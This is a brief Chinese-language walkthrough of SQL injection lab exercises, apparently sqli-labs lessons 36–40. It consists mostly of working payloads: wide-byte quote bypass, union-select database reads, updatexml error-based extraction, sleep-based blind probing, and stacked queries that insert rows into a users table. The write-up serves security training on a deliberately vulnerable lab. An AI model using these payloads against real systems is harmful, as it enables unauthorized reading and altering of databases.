1.lesson36 union select
判断注入:
为单引号注入
?id=1%df'-- +
查数据库:
?id=-1%df' union select 1,2,database()-- +
2.lesson-37 报错注入
判断注入:
为单引号注入
通过下方判断password为单引号注入
uname=z&passwd=g%df' -- +&submit=Submit
查数据库:
uname=z&passwd=g%df' or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&submit=Submit
3.lesson-38 堆叠注入
判断注入:
为单引号注入
因为代码有mysqli_multi_query这个函数,造成了堆叠注入,这个函数可以执行多条sql语句
往表中插入数据
?id=1';insert into users (username,password) values('11','11');%23
1';show database;-- +不可用,没有数据出来是因为代码只处理了第一个数据
union select 也可以查出数据
?id=-1' union select 1,2,database()-- +
4.lesson-39 堆叠注入
判断注入:
整型注入
?id=1';insert into users (username,password) values('22','22');%23
也可以用union select
-1 union select 1,2,database()
5.lesson-40 堆叠注入
判断注入:
没有报错,使用时间盲注判读闭合符号
?id=1') and sleep(5)-- +
插入数据:
?id=1');insert into users (username,password) values('33','33');%23
也可以用union select
-1') union select 1,2,database()-- +